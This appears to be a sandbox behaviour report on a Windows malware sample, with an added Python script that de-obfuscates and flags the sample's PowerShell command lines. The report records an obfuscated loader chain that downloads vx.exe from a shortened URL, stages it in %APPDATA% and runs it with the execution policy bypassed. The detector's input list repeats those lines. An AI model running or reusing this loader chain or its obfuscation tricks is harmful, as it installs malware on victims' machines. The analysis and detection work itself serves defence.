Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\1.1\Hyper-V.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psm1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.ni.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\2.0.0.0\Hyper-V.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.cdxml
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.xaml
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened / queried: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Hyper-V\Hyper-V.psd1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 (5 identical entries collapsed)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4056
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2178
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 3939
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2110
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 4386
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2252
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6184 Thread sleep count: 4056 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6184 Thread sleep count: 2178 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6416 Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6152 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6332 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6260 Thread sleep count: 3939 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6256 Thread sleep count: 2110 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6460 Thread sleep time: -4611686018427385s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6460 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6352 Thread sleep count: 59 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6376 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6308 Thread sleep count: 4386 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6308 Thread sleep count: 2252 > 30
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6472 Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6472 Thread sleep time: -30000s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6372 Thread sleep count: 59 > 30
Source: powershell.exe, 00000006.00000003.376603901.0000000007567000.00000004.00000001.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllvice0
Source: powershell.exe, 00000006.00000002.385597645.0000000004863000.00000004.00000001.sdmp, powershell.exe, 00000008.00000002.411829647.0000000004863000.00000004.00000001.sdmp Binary or memory string: f:C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Hyper-V
Source: powershell.exe, 00000009.00000003.430421096.0000000007E8E000.00000004.00000001.sdmp Binary or memory string: "1.0\Modules\Hyper-VsV
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug (3 identical entries collapsed)

HIPS / PFW / Operating System Protection Evasion:

Bypasses PowerShell execution policy
Source: unknown Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe
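The three command lines above are one loader chain run from cmd.exe: a hidden-window PowerShell (-w 1 is WindowStyle Hidden) downloads vx.exe with Net.WebClient.DownloadFile, a second instance moves it into %APPDATA% after a 20 second sleep, and a third runs it from there with the execution policy bypassed (-EP is an accepted prefix of -ExecutionPolicy). The backtick splits (stARt`-slE`Ep), the ('Down'+'loadFile') concatenation and the mixed case only exist to defeat substring rules on the raw command line: PowerShell drops a backtick that precedes a character which is not an escape letter, so the engine still sees plain Start-Sleep and New-Object. The Python below is an added example, not part of the sandbox report or of the sample; it undoes those layers first and matches indicators on the normalized text, using the report's own command lines as constructed input. The indicator names, regexes and the summarize() chain rule are this example's own choices, and the escape-letter set assumes Windows PowerShell 5.1.

```python
"""Normalize obfuscated PowerShell command lines, then match indicators.

Added example (not part of the sandbox report). Undoes backtick splitting,
('a'+'b') concatenation, ${env:...} bracing and mixed case before matching,
so those tricks do not defeat a simple substring rule.
"""
import re

# Command lines exactly as recorded in the report for this sample.
SAMPLE_CMDLINES = [
    "powershell -w 1 -EP bypass stARt`-slE`Ep 25; cd ${enV`:appdata}; ./vx.exe",
    "powershell -w 1 (nEw-oB`jecT Net.WebcL`IENt).('Down'+'loadFile').'Invoke'('https://cutt.ly/ZhqUH1O','vx.exe')",
    "powershell -w 1 stARt`-slE`Ep 20; Move-Item 'vx.exe' -Destination '${enV`:appdata}'",
]

# A backtick only means something before one of the escape letters (`n `t `0 ...)
# or as a line continuation before whitespace; anywhere else PowerShell drops it,
# which is exactly what the obfuscator relies on. Assumption: the Windows
# PowerShell 5.1 escape set (no `e, which only exists in PowerShell 6+).
_NOOP_BACKTICK = re.compile(r"`(?![0abefnrtuv\s])")
_STR = r"(?:'[^']*'|\"[^\"]*\")"
# ('Down'+'loadFile'): two or more string literals joined by + inside parentheses.
_CONCAT = re.compile(r"\(\s*" + _STR + r"(?:\s*\+\s*" + _STR + r")+\s*\)")
_QUOTED_MEMBER = re.compile(r"\.['\"](\w+)['\"]")  # .'Invoke'  ->  .Invoke
_BRACED_VAR = re.compile(r"\$\{([^}]*)\}")         # ${env:appdata} -> $env:appdata


def _join_literals(m):
    parts = re.findall(r"['\"]([^'\"]*)['\"]", m.group(0))
    return "'" + "".join(parts) + "'"


def normalize(cmdline):
    """Return the command line lower-cased with the obfuscation layers removed."""
    s = _NOOP_BACKTICK.sub("", cmdline)
    s = _CONCAT.sub(_join_literals, s)
    s = _QUOTED_MEMBER.sub(r".\1", s)
    s = _BRACED_VAR.sub(r"$\1", s)
    return s.lower()


# Matched against the normalized line. Parameter prefixes are accepted because
# powershell.exe takes any unambiguous prefix (-EP, -Ex, -W ...). Names are ours.
INDICATORS = {
    "execution_policy_bypass": re.compile(r"-(?:ep|ex[a-z]*)\s+(?:bypass|unrestricted)\b"),
    "hidden_window": re.compile(r"-w(?:in[a-z]*)?\s+(?:1|hidden)\b"),  # WindowStyle Hidden == 1
    "web_download": re.compile(r"net\.webclient|downloadfile|downloadstring|invoke-webrequest"),
    "sleep_delay": re.compile(r"start-sleep\s+\d+"),
    "appdata_staging": re.compile(r"\$env:appdata"),
}


def analyze(cmdline):
    """Normalize one command line and list the indicators it triggers."""
    norm = normalize(cmdline)
    hits = [name for name, rx in INDICATORS.items() if rx.search(norm)]
    # The obfuscation itself is an indicator and is judged on the raw line.
    if _NOOP_BACKTICK.search(cmdline):
        hits.append("backtick_obfuscation")
    if _CONCAT.search(cmdline):
        hits.append("string_concat_obfuscation")
    return {"normalized": norm, "indicators": hits}


def summarize(cmdlines):
    """Union the indicators over a process chain; flag download, stage in
    %APPDATA%, execute with policy bypass as one pattern (our rule)."""
    found = set()
    for c in cmdlines:
        found.update(analyze(c)["indicators"])
    chain = {"web_download", "appdata_staging", "execution_policy_bypass"} <= found
    return {"indicators": sorted(found), "download_stage_execute_chain": chain}


if __name__ == "__main__":
    for c in SAMPLE_CMDLINES:
        r = analyze(c)
        print(r["normalized"])
        print("   ->", ", ".join(r["indicators"]))
    print(summarize(SAMPLE_CMDLINES))
```

Run stand-alone it prints each normalized line with its indicators and the chain verdict; for hunting, feed it the CommandLine field of Sysmon Event ID 1 or Security 4688 records instead of SAMPLE_CMDLINES. The normalization deliberately runs before matching: a rule written against the raw line would have to enumerate every backtick position and case variant, which is what the loader counts on.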
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (3 identical entries collapsed)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation (3 identical entries collapsed)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation (2 identical entries collapsed)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation (2 identical entries collapsed)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation (3 identical entries collapsed)
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
